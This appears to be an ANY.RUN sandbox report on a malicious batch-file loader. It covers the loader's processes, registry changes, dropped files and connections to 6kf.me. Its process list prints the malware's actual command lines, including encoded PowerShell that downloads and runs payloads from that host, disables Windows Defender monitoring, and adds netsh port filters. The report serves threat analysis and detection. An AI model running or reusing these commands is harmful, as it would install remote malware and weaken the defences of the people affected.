File name:

Nouveau document texte.bat

Full analysis: https://app.any.run/tasks/3dfc6867-7213-4978-bbb6-4ec038f4b42f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 28, 2021, 08:38:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with no line terminators
MD5:

BA9F5F39EEF95F83AE5783E009185080

SHA1:

9F763BABE3AAF3D702A6EC90D73062DD33F73206

SHA256:

654C9AB14363760EC77B134BB45CB7528FDFE948725DC5F76F100D4CBDEE49F2

SSDEEP:

12:ZkNvVPf2Mf6kasqdTJbDRGSBkiJfe2x9KQh62mGtcfPxD2:IPlf6kah1nJe2yG7cfPp2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • mshta.exe (PID: 2404)
      • cmd.exe (PID: 1956)
    • Starts Visual C# compiler

      • powershell.exe (PID: 2128)
  • SUSPICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 1720)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1744)
    • Creates files in the user directory

      • powershell.exe (PID: 2128)
      • powershell.exe (PID: 1744)
    • Reads Environment values

      • MsiExec.exe (PID: 2132)
    • Creates a directory in Program Files

      • msiexec.exe (PID: 588)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 588)
    • Creates files in the Windows directory

      • msiexec.exe (PID: 588)
    • Creates or modifies windows services

      • netsh.exe (PID: 2952)
    • Uses NETSH.EXE for network configuration

      • MsiExec.exe (PID: 2132)
    • Drops a file with too old compile date

      • msiexec.exe (PID: 588)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 2404)
    • Application launched itself

      • msiexec.exe (PID: 588)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
96
Monitored processes
36
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs mshta.exe no specs powershell.exe cmd.exe powershell.exe no specs csc.exe no specs cvtres.exe no specs msiexec.exe msiexec.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs takeown.exe no specs cacls.exe no specs takeown.exe no specs cacls.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
356"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCPC:\Windows\System32\netsh.exeMsiExec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Network Command Shell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\netsh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\credui.dll
c:\windows\system32\user32.dll
588C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
592"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCPC:\Windows\System32\netsh.exeMsiExec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Network Command Shell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\netsh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\credui.dll
c:\windows\system32\user32.dll
952"C:\Windows\System32\netsh.exe" ipsec static add policy name=qianyeC:\Windows\System32\netsh.exeMsiExec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Network Command Shell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\netsh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\credui.dll
c:\windows\system32\user32.dll
1720cmd /c ""C:\Users\admin\AppData\Local\Temp\Nouveau document texte.bat" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1744"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcAA6AC8ALwA2AGsAZgAuAG0AZQAvAGQAbAAuAHAAaABwAD8AaQBkAD0AMQAnADsAaQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJABhACkAOwBNAHMAaQBNAGEAawBlACAAKAAiACQAYQAiACsAJwAxACcAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADMAMAANAAoAfQANAAoAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1824"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCPC:\Windows\System32\netsh.exeMsiExec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Network Command Shell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\netsh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\credui.dll
c:\windows\system32\user32.dll
1956C:\Windows\system32\cmd.exe /c powershell.exe -nop -exec bypass -EncodedCommand DQAKACQAYwB1AHIAcgBlAG4AdABQAHIAaQBuAGMAaQBwAGEAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkADQAKAGkAZgAgACgAJABjAHUAcgByAGUAbgB0AFAAcgBpAG4AYwBpAHAAYQBsAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AOgA6AEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAKQApAA0ACgB7AA0ACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBEAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAAJAB0AHIAdQBlAA0ACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgAkAGUAbgB2ADoAdwBpAG4AZABpAHIAIgANAAoAJABSAGUAZwBrAGUAeQBwAGEAdABoACAAPQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwANwAtAFoAaQBwACIADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUABGADgAOABkAE4AYwBkAHMARABEAHEAZQA3AFoAZgANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAdQB0AG8AKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE0AcwBpAEkAbgBzAHQAYQBsAGwAUAByAG8AZAB1AGMAdAAoAHMAdAByAGkAbgBnACAAcABhAGMAawBhAGcAZQBQAGEAdABoACwAIABzAHQAcgBpAG4AZwAgAGMAbwBtAG0AYQBuAGQATABpAG4AZQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwBpAC4AZABsAGwAIgApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBzAGkAUwBlAHQASQBuAHQAZQByAG4AYQBsAFUASQAoAGkAbgB0ACAAZAB3AFUASQBMAGUAdgBlAGwALAAgAEkAbgB0AFAAdAByACAAcABoAFcAbgBkACkAOwANAAoAfQANAAoAIgBAAA0ACgBkAG8ADQAKAHsADQAKACQAbQBzAGkAcABhAHQAaABBACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2AGsAZgAuAG0AZQAvAGQAbAAuAHAAaABwAD8AaQBkAD0AMQAxACIADQAKACQAbQBzAGkAcABhAHQAaABBAEwATAAgAD0AIABAACgAIgAkAG0AcwBpAHAAYQB0AGgAQQAiACwAIgAkAG0AcwBpAHAAYQB0AGgAQQAiACkADQAKACQATgBkAFMAVQBJAHcAdQB1AFcAbgBwAFkASAB6AEYAdQAgAD0AIABnAGUAdAAtAHIAYQBuAGQAbwBtACAAJABtAHMAaQBwAGEAdABoAEEATABMADsADQAKAFsAUABGADgAOABkAE4AYwBkAHMARABEAHEAZQA3AFoAZgBdADoAOgBNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAMgAsADAAKQA7AA0ACgBbAFAARgA4ADgAZABOAGMAZABzAEQARABxAGUANwBaAGYAXQA6ADoATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAIgAkAE4AZABTAFUASQB3AHUAdQBXAG4AcABZAEgAegBGAHUAIgAsACIAIgApAA0ACgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAADQAKAH0ADQAKAHUAbgB0AGkAbAAgACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAUgBlAGcAawBlAHkAcABhAHQAaAAgAC0AbgBhAG0AZQAgAFMAdABhAHkATwBuAFQAbwBwACkADQAKAH0ADQAKAA==C:\Windows\system32\cmd.exe
powershell.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2128powershell.exe -nop -exec bypass -EncodedCommand DQAKACQAYwB1AHIAcgBlAG4AdABQAHIAaQBuAGMAaQBwAGEAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkADQAKAGkAZgAgACgAJABjAHUAcgByAGUAbgB0AFAAcgBpAG4AYwBpAHAAYQBsAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AOgA6AEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAKQApAA0ACgB7AA0ACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBEAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAAJAB0AHIAdQBlAA0ACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgAkAGUAbgB2ADoAdwBpAG4AZABpAHIAIgANAAoAJABSAGUAZwBrAGUAeQBwAGEAdABoACAAPQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwANwAtAFoAaQBwACIADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUABGADgAOABkAE4AYwBkAHMARABEAHEAZQA3AFoAZgANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAdQB0AG8AKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE0AcwBpAEkAbgBzAHQAYQBsAGwAUAByAG8AZAB1AGMAdAAoAHMAdAByAGkAbgBnACAAcABhAGMAawBhAGcAZQBQAGEAdABoACwAIABzAHQAcgBpAG4AZwAgAGMAbwBtAG0AYQBuAGQATABpAG4AZQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwBpAC4AZABsAGwAIgApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBzAGkAUwBlAHQASQBuAHQAZQByAG4AYQBsAFUASQAoAGkAbgB0ACAAZAB3AFUASQBMAGUAdgBlAGwALAAgAEkAbgB0AFAAdAByACAAcABoAFcAbgBkACkAOwANAAoAfQANAAoAIgBAAA0ACgBkAG8ADQAKAHsADQAKACQAbQBzAGkAcABhAHQAaABBACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2AGsAZgAuAG0AZQAvAGQAbAAuAHAAaABwAD8AaQBkAD0AMQAxACIADQAKACQAbQBzAGkAcABhAHQAaABBAEwATAAgAD0AIABAACgAIgAkAG0AcwBpAHAAYQB0AGgAQQAiACwAIgAkAG0AcwBpAHAAYQB0AGgAQQAiACkADQAKACQATgBkAFMAVQBJAHcAdQB1AFcAbgBwAFkASAB6AEYAdQAgAD0AIABnAGUAdAAtAHIAYQBuAGQAbwBtACAAJABtAHMAaQBwAGEAdABoAEEATABMADsADQAKAFsAUABGADgAOABkAE4AYwBkAHMARABEAHEAZQA3AFoAZgBdADoAOgBNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAMgAsADAAKQA7AA0ACgBbAFAARgA4ADgAZABOAGMAZABzAEQARABxAGUANwBaAGYAXQA6ADoATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAIgAkAE4AZABTAFUASQB3AHUAdQBXAG4AcABZAEgAegBGAHUAIgAsACIAIgApAA0ACgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAADQAKAH0ADQAKAHUAbgB0AGkAbAAgACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAUgBlAGcAawBlAHkAcABhAHQAaAAgAC0AbgBhAG0AZQAgAFMAdABhAHkATwBuAFQAbwBwACkADQAKAH0ADQAKAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2132C:\Windows\system32\MsiExec.exe -Embedding B68CDD7903D78920D9272E8171DC12F4 M Global\MSI0000C:\Windows\system32\MsiExec.exemsiexec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
2 152
Read events
864
Write events
1 286
Delete events
2

Modification events

(PID) Process:(2404) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2404) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2404) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2404) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2404) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(2404) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(2404) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
46000000A5000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(1744) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\13D\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(1744) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1744) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
2
Suspicious files
8
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
1744powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\97U5PTN4MGYLSZ4A96DY.temp
MD5:
SHA256:
2128powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3CEZ6UJMME2T4SUA93C0.temp
MD5:
SHA256:
2128powershell.exeC:\Users\admin\AppData\Local\Temp\sliprwhe.0.cs
MD5:
SHA256:
2128powershell.exeC:\Users\admin\AppData\Local\Temp\sliprwhe.cmdline
MD5:
SHA256:
2160csc.exeC:\Users\admin\AppData\Local\Temp\CSC187F.tmp
MD5:
SHA256:
2160csc.exeC:\Users\admin\AppData\Local\Temp\sliprwhe.pdb
MD5:
SHA256:
3724cvtres.exeC:\Users\admin\AppData\Local\Temp\RES1880.tmp
MD5:
SHA256:
2160csc.exeC:\Users\admin\AppData\Local\Temp\sliprwhe.dll
MD5:
SHA256:
2160csc.exeC:\Users\admin\AppData\Local\Temp\sliprwhe.out
MD5:
SHA256:
588msiexec.exeC:\Windows\Installer\MSI5FCA.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
588
msiexec.exe
GET
200
104.21.54.103:80
http://6kf.me/M0011.cab
US
compressed
1.24 Mb
suspicious
588
msiexec.exe
GET
200
104.21.54.103:80
http://6kf.me/dl.php?id=11
US
executable
996 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
588
msiexec.exe
104.21.54.103:80
6kf.me
Cloudflare Inc
US
suspicious
1744
powershell.exe
104.21.54.103:80
6kf.me
Cloudflare Inc
US
suspicious

DNS requests

Domain
IP
Reputation
6kf.me
  • 104.21.54.103
  • 172.67.168.112
suspicious

Threats

Found threats are available for the paid subscriptions
2 ETPRO signatures available at the full report
No debug info